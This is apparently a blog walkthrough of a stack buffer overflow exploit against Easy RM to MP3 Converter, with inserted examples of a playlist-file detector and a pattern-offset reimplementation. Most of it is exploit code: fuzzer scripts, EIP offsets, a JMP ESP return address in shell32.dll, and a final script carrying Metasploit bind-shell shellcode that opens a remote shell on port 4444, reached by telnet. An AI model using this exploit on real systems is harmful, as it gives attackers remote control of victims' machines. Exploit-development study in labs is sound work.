Tuesday, 25 September 2012

STACK OVERFLOW EASY RM TO MP3 CONVERTER (NON SEH)

This time I will walk through how to exploit Easy RM to MP3 Converter.
Note that this is a non-SEH exploit (it does not go through the Structured Exception Handler); you can look up what SEH means online if you are not familiar with it.

OK, let's begin.

1. First we need OllyDbg and Easy RM to MP3 Converter to start the exploitation.

Install and run them on Windows inside VirtualBox.

2. Then we need Python or something similar to write a fuzzer for the exploit.
I use Python for the fuzzer.

My fuzzer looks like this:


#!/usr/bin/python
# Python 2 script (BackTrack): str literals are plain bytes, so "w" mode writes them unchanged
buffer="http://"+"\x41" * 28000      # "http://" followed by 28000 'A' (0x41) bytes
out=open("pusing1.ram", "w")         # output playlist file that will be loaded into Easy RM to MP3
out.write(buffer)
print("sukses gawe file")            # Javanese: "file created successfully"
out.close()

This means we write 28000 bytes of junk after "http://", and the output file is pusing1.ram.
Save it to your directory, then run the fuzzer from the BackTrack console.
In this case I saved the fuzzer in the shared-folder directory to make the file easy to reach.

Once the fuzzer runs it generates the output file. In the picture below you can see pusing1.ram as the output.

3. Run Easy Converter under OllyDbg, and load the output file 'pusing1.ram' into Easy Converter.
See what happens in OllyDbg: the CPU registers pane will show an error / crash.
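From the defender's side, the file that triggers this crash has an obvious shape: a real .ram playlist holds short URL lines, while the fuzzer output is one "http://" line followed by tens of thousands of identical bytes. The following is an added example, not part of the original post, of a small triage check that flags such files before they reach the player. The thresholds, the function names (scan_ram, is_suspicious) and the sample playlists are my own assumptions.

```python
#!/usr/bin/env python3
# Added example, not part of the original post: a triage check for .ram
# playlist files. A legitimate .ram file holds short URL lines such as
# "rtsp://host/path.rm"; the crash file from step 2 instead holds a single
# "http://" line followed by tens of thousands of identical bytes. The
# thresholds and function names here are my own assumptions.
import re

MAX_LINE_LEN = 2048      # assumed: far longer than any real playlist URL
MAX_REPEAT_RUN = 64      # assumed: this many identical bytes in a row looks like padding
URL_RE = re.compile(rb"^[a-zA-Z][a-zA-Z0-9+.-]*://[\x21-\x7e]+$")
RUN_RE = re.compile(rb"(.)\1{" + str(MAX_REPEAT_RUN - 1).encode() + rb",}")


def scan_ram(data):
    """Return a list of (line_number, reason) findings for the bytes of a .ram file."""
    findings = []
    for lineno, line in enumerate(data.splitlines(), 1):
        if not line.strip():
            continue
        if len(line) > MAX_LINE_LEN:
            findings.append((lineno, "line length %d exceeds %d" % (len(line), MAX_LINE_LEN)))
        if any(b < 0x20 or b > 0x7e for b in line):
            findings.append((lineno, "non-printable bytes in playlist line"))
        run = RUN_RE.search(line)
        if run:
            findings.append((lineno, "run of %d identical bytes (0x%02x)"
                             % (len(run.group(0)), run.group(1)[0])))
        if not URL_RE.match(line):
            findings.append((lineno, "line is not a plain URL"))
    return findings


def is_suspicious(data):
    """True when any finding was raised, i.e. the file should not be handed to the player."""
    return bool(scan_ram(data))


# Constructed samples: a normal two-entry playlist and a file shaped like the
# step 2 fuzzer output ("http://" plus 28000 'A' bytes).
BENIGN_RAM = b"rtsp://media.example/song.rm\r\nhttp://media.example/clip.rm\r\n"
FUZZ_RAM = b"http://" + b"\x41" * 28000

if __name__ == "__main__":
    for name, sample in (("benign", BENIGN_RAM), ("fuzz", FUZZ_RAM)):
        print(name, scan_ram(sample))
```

The length check alone already catches the step 2 file; the repeat-run and non-printable checks are there for later variants of the same file, where the junk is NOP (0x90) or INT3 (0xCC) bytes rather than 'A's. The same idea applies to any player or converter that parses attacker-supplied playlist files: bound the line length before copying it anywhere.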

4. Now that we know the application crashes with 28000 bytes, we generate a unique pattern of that length using pattern_create.rb, then copy-paste it into the fuzzer.

5. Rerun the fuzzer and see what happens in the CPU registers. The value of EIP changes to 326D4831.

Then we calculate at which position in the pattern it crashes, using pattern_offset.rb.

EIP matches the pattern at offsets 5825 and 26105; ESP matches at offsets 5833 and 26113.
I tried 5825 but it does not cause a crash, so I used 26105, and the result really is a crash.
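To show where these numbers come from (and why pattern_offset.rb reports two of them), here is an added example that is not part of the original post: a Python 3 re-implementation of the logic behind Metasploit's pattern_create.rb and pattern_offset.rb. The function names pattern_create, le32 and pattern_offset are my own; the alphabet and ordering of the pattern follow the Metasploit tools. le32 is the same little-endian conversion that step 6 performs by hand on the JMP ESP address.

```python
#!/usr/bin/env python3
# Added example, not part of the original post: a re-implementation of the
# logic behind Metasploit's pattern_create.rb / pattern_offset.rb, so the
# offsets quoted in the walkthrough (EIP = 326D4831 -> 5825 and 26105) can be
# reproduced without the Metasploit tools. Function names are my own; the
# alphabet and ordering (Aa0Aa1...Aa9Ab0...) follow the Metasploit tools.
import struct
from itertools import product
from string import ascii_uppercase, ascii_lowercase, digits

# One full cycle of the pattern: 26 * 26 * 10 three-byte groups = 20280 bytes.
# Inside one cycle every 4-byte window is unique; beyond it the pattern repeats.
PERIOD = len(ascii_uppercase) * len(ascii_lowercase) * len(digits) * 3


def pattern_create(length):
    """Return `length` bytes of the cyclic pattern (Aa0Aa1Aa2...)."""
    out = bytearray()
    while len(out) < length:
        for upper, lower, digit in product(ascii_uppercase, ascii_lowercase, digits):
            out += (upper + lower + digit).encode("ascii")
            if len(out) >= length:
                break
    return bytes(out[:length])


def le32(value):
    """Pack a 32-bit value the way it sits in x86 memory (little endian):
    0x7C9D30D7 becomes the byte sequence D7 30 9D 7C. This is the conversion
    that step 6 of the walkthrough does by hand."""
    return struct.pack("<I", value)


def pattern_offset(pattern, register_value):
    """Every offset in `pattern` at which the 4 bytes now in a register occur.
    `register_value` is the hex value OllyDbg shows (e.g. 0x326D4831); the
    register was loaded from memory in little-endian order, so the search key
    is le32(register_value)."""
    needle = le32(register_value)
    offsets, start = [], 0
    while True:
        idx = pattern.find(needle, start)
        if idx < 0:
            return offsets
        offsets.append(idx)
        start = idx + 1


if __name__ == "__main__":
    pat = pattern_create(28000)
    print(pattern_offset(pat, 0x326D4831))   # [5825, 26105], as in the walkthrough
    print(le32(0x7C9D30D7))                  # b'\xd7\x30\x9d\x7c'
```

The lookup returns two offsets because a 28000-byte pattern is longer than the 20280-byte period: the 4-byte sequence "1Hm2" (the little-endian form of 326D4831) occurs once at 5825 and again at 5825 + 20280 = 26105. Only one of the two is the position that actually overwrote the saved return address, and the walkthrough settles it by trying each length. The ESP offsets the post quotes come from the same lookup on the bytes ESP pointed at; they sit 8 bytes past the EIP offsets both times.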

buffer="http://"+"\x90" * 26105      # 26105 NOP (0x90) bytes bring us up to the saved return address
buffer+="\xEF\xBE\xAD\xDE"           # DEADBEEF in little-endian order; this is what lands in EIP
# (the open / write / close lines from the first fuzzer stay the same)

The value of EIP changes to DEADBEEF.

Then I add the ESP offset to the fuzzer:

buffer="http://"+"\x90" * 26105                       # NOP padding up to the EIP offset
buffer+="\xEF\xBE\xAD\xDE"                            # DEADBEEF marker that lands in EIP
buffer+="http://"+"\x90" * (26113-len(buffer))        # pad towards the ESP offset (the literal "http://" is added on top of the count, so the buffer ends 7 bytes past 26113)
buffer+="http://"+"\xCC" * (28000-len(buffer))        # fill the rest with INT3 (0xCC) so the stack is easy to recognise

Rerun the fuzzer, and you will see:

The stack window in OllyDbg contains junk data in the form of \xCC characters.


6. Next, following the exploitation strategy, we look for a JMP ESP instruction.
Run the fuzzer file in Easy Converter under OllyDbg. From the View menu, select the Executable modules submenu.

Double-click SHELL32.dll, then search for JMP ESP.

We find an address in shell32.dll that contains a JMP ESP instruction.

The resulting address is 7C9D30D7. We now make the fuzzer set the EIP register to the address of the JMP ESP inside shell32.dll.
First we must convert that address to little-endian format, from 7C9D30D7 to \xD7\x30\x9D\x7C.
So the fuzzer becomes:

buffer="http://"+"\x90" * 26105                       # NOP padding up to the EIP offset
buffer+="\xD7\x30\x9D\x7C"                            # 7C9D30D7 (JMP ESP in shell32.dll) in little-endian order
buffer+="http://"+"\x90" * (26113-len(buffer))        # pad towards the ESP offset (the literal "http://" is added on top of the count, so the buffer ends 7 bytes past 26113)
buffer+="http://"+"\xCC" * (28000-len(buffer))        # fill the rest with INT3 (0xCC)

Then set a breakpoint at address 7C9D30D7.
Run Easy Converter under OllyDbg and rerun the fuzzer. See what happens:

In the CPU registers we see SHELL32.7C9D30D7 right next to EIP: OllyDbg has paused execution at the breakpoint on 7C9D30D7.

7. The last step is to generate the payload with the Metasploit Framework. Choose the Win32 bind shell, enter the data as in the picture below, and click the Generate button.

Copy-paste the payload into the fuzzer:


#!/usr/bin/python
# Python 2 script (BackTrack): str literals are plain bytes, so "w" mode writes them unchanged
buffer="http://"+"\x90" * 26105                       # NOP padding up to the saved return address
buffer+="\xD7\x30\x9D\x7C"                            # 7C9D30D7 (JMP ESP in shell32.dll) in little-endian order
#buffer+="http://"+"\x90" * (26113-len(buffer))       # earlier ESP-offset padding, no longer used
#buffer+="http://"+"\xCC" * (28000-len(buffer))       # earlier INT3 filler, no longer used
buffer+="\x90" * 32                                   # small NOP sled where ESP points, ahead of the payload
# Metasploit-generated Win32 bind shell payload (listens on port 4444) follows
buffer+= ("\xdd\xc3\x31\xc9\xd9\x74\x24\xf4\x5b\xb1\x51\xbf\xa1\x1a\xa8\x27"
"\x83\xc3\x04\x31\x7b\x13\x03\xda\x09\x4a\xd2\xe0\x44\x61\x50\xf0"
"\x60\x8a\x94\xff\xf3\xfe\x07\xdb\xd7\x8b\x9d\x1f\x93\xf0\x18\x27"
"\xa2\xe7\xa8\x98\xbc\x7c\xf1\x06\xbc\x69\x47\xcd\x8a\xe6\x59\x3f"
"\xc3\x38\xc0\x13\xa0\x79\x87\x6c\x68\xb3\x65\x73\xa8\xaf\x82\x48"
"\x78\x14\x43\xdb\x65\xdf\xcc\x07\x67\x0b\x94\xcc\x6b\x80\xd2\x8d"
"\x6f\x17\x0e\x32\xbc\x9c\x59\x58\x98\xbe\x38\x63\xd1\x65\xde\xe8"
"\x51\xaa\x94\xae\x59\x41\xda\x32\xcf\xde\x5b\x42\x51\x89\xd5\x1c"
"\x63\xa5\xba\x5f\xad\x53\x68\xf9\x3a\xaf\xbc\x6d\xcc\xbc\xf2\x32"
"\x66\xbc\x23\xa4\x4d\xaf\x38\x0f\x02\xcf\x17\x30\x2b\xca\xfe\x4f"
"\xc6\x1d\xfd\x1a\x73\x1c\xfe\x74\xeb\xf9\x09\x81\x41\xae\xf6\xbf"
"\xc9\x02\x5a\x6c\xbd\xe7\x0f\xd1\x12\x17\x7f\xb3\xfc\xf6\xdc\x5d"
"\xae\x71\x3d\x34\x38\x26\xa4\x46\x7e\x71\x26\x70\xea\x6e\x89\x29"
"\x14\x5e\x41\x75\x47\x71\x7b\x22\x67\x58\x28\x99\x68\xb5\xa7\xc4"
"\xde\xb0\x71\x51\x1e\x6a\xd1\x09\xb4\xc6\x2d\x61\xa7\x81\x36\xf8"
"\x0e\x28\xee\x05\x58\x9e\xef\x29\x03\x4b\x74\xaf\xa4\xe8\x19\xa6"
"\xd0\x85\xb1\xe1\x33\x96\xbb\xf6\x2e\x62\x35\x1a\x9f\xaa\xb6\x70"
"\x1e\x68\x14\x7a\x9d\x41\xf5\x0f\x58\xa2\x52\xa4\x36\xba\xd6\x44"
"\xfb\x2d\xe8\xcd\xb8\xae\xc0\x76\x16\x03\xbc\xd9\xc9\xc9\x3f\x88"
"\xb8\x58\x11\xd5\xeb\x0b\x3c\xf0\x09\x02\x6d\xfd\xc4\xf0\x6d\xfe"
"\xde\xfb\x42\x8b\x76\xf8\xe0\x4f\x1c\xff\x31\x1d\x22\x2f\xd5\xdf"
"\x04\x32\x55\x4c\x4a\x65\x65\xa2")
out=open("pusing6.ram", "w")         # output playlist file that will be loaded into Easy RM to MP3
out.write(buffer)
print("sukses gawe file")            # Javanese: "file created successfully"
out.close()


Run Easy Converter without OllyDbg, then open / load the fuzzer file.

Wow, Easy Converter crashes.

After running the fuzzer file, use telnet to connect to the Windows XP system on port 4444.

You can see what happens...

CMIIW
